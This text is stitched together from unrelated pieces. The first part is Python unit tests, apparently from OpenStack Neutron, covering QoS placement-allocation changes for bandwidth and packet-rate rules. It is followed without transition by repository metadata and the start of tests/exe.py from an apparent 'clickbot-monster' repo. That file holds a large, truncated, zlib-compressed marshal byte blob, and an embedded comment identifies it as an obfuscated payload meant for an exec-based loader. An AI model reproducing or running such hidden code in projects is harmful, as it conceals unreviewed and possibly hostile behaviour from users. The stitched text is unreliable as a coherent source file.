self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type',
profile={'allocation': 'fake_allocation'})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 1)
mock_alloc_change_calls = [
mock.call(
original_qos,
None,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': None},
mock.ANY),
]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
self.assertDictEqual(port1.bindings[0].profile, {})
def test_check_network_for_placement_allocation_change(self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
port2 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port2_binding = ports_object.PortBinding(
self.context, port_id=port2.id, host='fake_host2',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port2_binding.create()
port2.bindings = [port2_binding]
port2.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {'allocation': 'fake_allocation'}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 2)
mock_alloc_change_calls = [
mock.call(
original_qos,
qos,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY),
mock.call(
original_qos,
qos,
{'id': port2.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY)]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
port2.update()
self.assertDictEqual(
port1.bindings[0].profile, {'allocation': 'fake_allocation'})
self.assertDictEqual(
port2.bindings[0].profile, {'allocation': 'fake_allocation'})
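# Helper that attaches minimum-bandwidth and/or minimum-packet-rate rules
# (with the fixed rule ids above) to the original and desired policies, and
# seeds the port's binding:profile 'allocation' map so each request-group
# UUID points at its resource provider.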
def _prepare_port_for_placement_allocation(self, original_qos,
desired_qos=None,
qos_network_policy=None,
original_min_kbps=None,
desired_min_kbps=None,
original_min_kpps=None,
desired_min_kpps=None,
is_sriov=False):
kwargs = self._prepare_for_port_placement_allocation_change(
original_qos, desired_qos, qos_network_policy=qos_network_policy)
orig_port = kwargs['original_port']
qos = original_qos or qos_network_policy
qos.rules = []
allocation = {}
if original_min_kbps:
qos.rules += [self._make_qos_minbw_rule(
qos.id, min_kbps=original_min_kbps,
rule_id=TestQosPluginDB.QOS_MIN_BW_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_BW_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_BW_RP})
if original_min_kpps:
qos.rules += [self._make_qos_minpps_rule(
qos.id, min_kpps=original_min_kpps,
rule_id=TestQosPluginDB.QOS_MIN_PPS_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_PPS_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_PPS_RP})
if desired_qos:
desired_qos.rules = []
if desired_min_kbps:
desired_qos.rules += [self._make_qos_minbw_rule(
desired_qos.id, min_kbps=desired_min_kbps)]
if desired_min_kpps:
desired_qos.rules += [self._make_qos_minpps_rule(
desired_qos.id, min_kpps=desired_min_kpps)]
binding_prof = {}
if is_sriov:
binding_prof = {
'pci_slot': '0000:42:41.0',
'pci_vendor_info': '8086:107ed',
'physical_network': 'sriov_phy'
}
binding_prof.update({'allocation': allocation})
orig_port.update(
{'binding:profile': binding_prof,
'device_id': 'uu:id'}
)
return orig_port, kwargs['port']
def _assert_pci_info(self, port):
self.assertIn('pci_slot', port['binding:profile'])
self.assertIn('pci_vendor_info', port['binding:profile'])
self.assertIn('physical_network', port['binding:profile'])
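# The alloc_diff sent to placement is the per-resource-provider delta
# between the desired and the original rule. As a sketch of the first case
# below: desired 2000 kbps minus original 1000 kbps gives
#   {MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}}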
def test_change_placement_allocation_increase(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps_and_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500},
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
def test_change_placement_allocation_change_direction_min_pps_and_min_bw(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'egress'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -500,
'NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC': 1000},
self.MIN_BW_RP: {
'NET_BW_IGR_KILOBIT_PER_SEC': -1000,
'NET_BW_EGR_KILOBIT_PER_SEC': 2000}})
def test_change_placement_allocation_change_dir_min_pps_ingress_to_any(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'any'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.assertRaises(NotImplementedError,
self.qos_plugin._change_placement_allocation, qos1, qos2,
orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement_with_pps(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000, original_min_kpps=500,
desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500}})
def test_change_placement_allocation_decrease(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kbps=2000,
desired_min_kbps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_decrease_min_pps(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kpps=2000,
desired_min_kpps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_no_original_qos(self):
qos1 = None
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_no_original_allocation(self):
qos1 = self._make_qos_policy()
rule1_obj = self._make_qos_minbw_rule(qos1.id, min_kbps=500)
qos1.rules = [rule1_obj]
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_policy_empty(self):
qos1 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000, original_min_kpps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000},
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -2000}})
def test_change_placement_allocation_no_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
dscp_rule1 = rule_object.QosDscpMarkingRule(dscp_mark=16)
dscp_rule2 = rule_object.QosDscpMarkingRule(dscp_mark=18)
qos1.rules = [dscp_rule1]
qos2.rules = [dscp_rule2]
orig_port = {
'binding:profile': {'allocation': {
self.MIN_BW_REQUEST_GROUP_UUID: self.MIN_BW_RP}},
'device_id': 'uu:id',
'id': '9416c220-160a-11ec-ba3d-474633eb825c',
}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_old_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
dscp_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=2000)
qos1.rules = [dscp_rule]
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
dscp_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
qos2.rules = [dscp_rule]
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
def test_change_placement_allocation_equal_minkbps_and_minkpps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=1000,
original_min_kpps=1000, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_not_called()
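# A keystoneauth Conflict carrying the placement.concurrent_update error
# code is expected to be translated into Neutron's
# QosPlacementAllocationUpdateConflict exception.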
def test_change_placement_allocation_update_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = ks_exc.Conflict(
response={'errors': [{'code': 'placement.concurrent_update'}]}
)
self.assertRaises(
neutron_qos_exc.QosPlacementAllocationUpdateConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_update_generation_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = (
pl_exc.PlacementAllocationGenerationConflict(
consumer=self.MIN_BW_RP))
self.assertRaises(
pl_exc.PlacementAllocationGenerationConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_qos_network_policy(self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
None, desired_qos, qos_network_policy=qos_network,
original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos_network, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
hexsha: 6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b
size: 14182
ext: py
lang: Python
max_stars_repo_path: tests/exe.py
max_stars_repo_name: toutpuissantged/clickbot-monster
max_stars_repo_head_hexsha: b8ccefb5078104ea91d30b9147cc59f92c70ed57
max_stars_repo_licenses: ["MIT"]
max_stars_count: 4
max_stars_repo_stars_event_min_datetime: 2021-02-11T13:43:55.000Z
max_stars_repo_stars_event_max_datetime: 2021-11-14T20:16:34.000Z
max_issues_repo_path: tests/exe.py
max_issues_repo_name: toutpuissantged/clickbot-monster
max_issues_repo_head_hexsha: b8ccefb5078104ea91d30b9147cc59f92c70ed57
max_issues_repo_licenses: ["MIT"]
max_issues_count: 3
max_issues_repo_issues_event_min_datetime: 2021-10-04T12:16:00.000Z
max_issues_repo_issues_event_max_datetime: 2021-12-10T06:02:41.000Z
max_forks_repo_path: tests/exe.py
max_forks_repo_name: toutpuissantged/clickbot-monster
max_forks_repo_head_hexsha: b8ccefb5078104ea91d30b9147cc59f92c70ed57
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
import marshal as ms
import zlib
import base64 as bs
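# NOTE: the byte string below is an obfuscated, zlib-compressed payload
# (truncated in this copy; the literal starts with the zlib header
# b'x\xda'). base64 is imported but unused in the visible portion. The usual
# pattern for loaders of this shape is -- a sketch, not recovered from this
# file:
#   exec(ms.loads(zlib.decompress(data)))
# Code like this should be treated as untrusted and not executed.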
data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 
\x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\xe3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd
